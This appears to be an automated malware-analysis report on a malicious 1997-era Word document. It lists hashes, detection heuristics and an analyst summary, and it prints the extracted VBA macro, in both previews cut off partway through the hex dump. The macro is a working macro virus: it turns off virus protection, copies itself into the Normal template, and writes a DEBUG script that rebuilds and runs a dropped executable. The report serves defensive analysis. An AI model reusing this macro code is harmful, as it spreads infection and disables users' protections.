Office (OLE) malware analysis — malicious · bb2775ee5dd3f58c

MALICIOUS

Office (OLE)

157.5 KB Created: 1997-01-29 21:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 589881b98f9eabd13583d8b1522e8ca3 SHA-1: a0c2fb0a7de44da518e6b4bae19d58b17a43eea9 SHA-256: bb2775ee5dd3f58cbb24ec4e8ce065d495f5ab21e59951aaed77a61e31df279c

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within its VBA macros. The AutoClose macro is designed to export its own code to 'c:\kloop.dat', then write a PE header and other data to 'c:\kloop.dbg', and finally attempt to execute 'c:\kloop.exe'. This strongly suggests the macro is acting as a downloader or initial execution stage for a secondary payload.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75537 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	75537 bytes
SHA-256: `13f8af63dd9ac9f7a4e584e409d71c15190f41829767e4714b2d8552b5f7dcaa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() On Error Resume Next Options.VirusProtection = (0 - 0) Options.SaveNormalPrompt = (0 - 0) Options.ConfirmConversions = (0 - 0) ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines If nt = 0 Then Set host = NormalTemplate.VBProject.VBComponents.Item(1) ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\kloop.dat" End If If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1) If nt > 0 And ad > 0 Then GoTo err host.codemodule.AddFromFile ("c:\kloop.dat") With host.codemodule For x = 1 To 4 .deletelines 1 Next x End With err: If nt <> 0 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName Kill "C:\KLOOP.DBG" Kill "C:\KLOOP.EX" Kill "C:\KLOOP.BAT" If Dir("C:\KLOOP.EXE") <> "" Then GoTo NODROP Open "C:\KLOOP.DBG" For Output As 5 Print #5, "N C:\KLOOP.EX" Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00" Print #5, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00" Print #5, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00" Print #5, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68" Print #5, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F" Print #5, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20" Print #5, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00" Print #5, "E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B" Print #5, "E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B" Print #5, "E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B" Print #5, "E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B" Print #5, "E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00" Print #5, "E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00" Print #5, "E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00" Print #5, "E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00" Print #5, "E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00" Print #5, "E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00" Print #5, "E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00" Print #5, "E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00" Print #5, "E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00" Print #5, "E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00" Print #5, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0" Print #5, "E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00" Print #5, "E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00" Print #5, "E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00" Print #5, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0" Print #5, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #5, "E ... (truncated)

SHA-256: 13f8af63dd9ac9f7a4e584e409d71c15190f41829767e4714b2d8552b5f7dcaa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
On Error Resume Next

Options.VirusProtection = (0 - 0)
Options.SaveNormalPrompt = (0 - 0)
Options.ConfirmConversions = (0 - 0)

ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines

If nt = 0 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\kloop.dat"
End If

If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nt > 0 And ad > 0 Then GoTo err

host.codemodule.AddFromFile ("c:\kloop.dat")
With host.codemodule
    For x = 1 To 4
    .deletelines 1
    Next x
End With

err:
If nt <> 0 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

Kill "C:\KLOOP.DBG"
Kill "C:\KLOOP.EX"
Kill "C:\KLOOP.BAT"

If Dir("C:\KLOOP.EXE") <> "" Then GoTo NODROP

Open "C:\KLOOP.DBG" For Output As 5
Print #5, "N C:\KLOOP.EX"

Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
Print #5, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #5, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00"
Print #5, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #5, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F"
Print #5, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20"
Print #5, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00"
Print #5, "E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B"
Print #5, "E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B"
Print #5, "E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B"
Print #5, "E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B"
Print #5, "E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00"
Print #5, "E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00"
Print #5, "E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00"
Print #5, "E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00"
Print #5, "E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #5, "E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00"
Print #5, "E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00"
Print #5, "E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00"
Print #5, "E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00"
Print #5, "E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00"
Print #5, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0"
Print #5, "E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00"
Print #5, "E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00"
Print #5, "E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00"
Print #5, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
Print #5, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.